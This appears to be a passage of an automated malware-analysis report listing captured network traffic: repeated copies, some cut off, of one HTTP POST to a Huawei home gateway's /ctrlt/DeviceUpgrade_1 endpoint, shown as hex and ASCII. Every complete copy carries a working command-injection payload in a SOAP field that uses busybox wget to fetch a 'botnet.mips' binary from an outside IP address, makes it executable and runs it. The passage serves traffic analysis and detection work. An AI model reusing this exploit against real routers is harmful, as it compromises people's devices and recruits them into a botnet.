      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima hua
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima hua
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 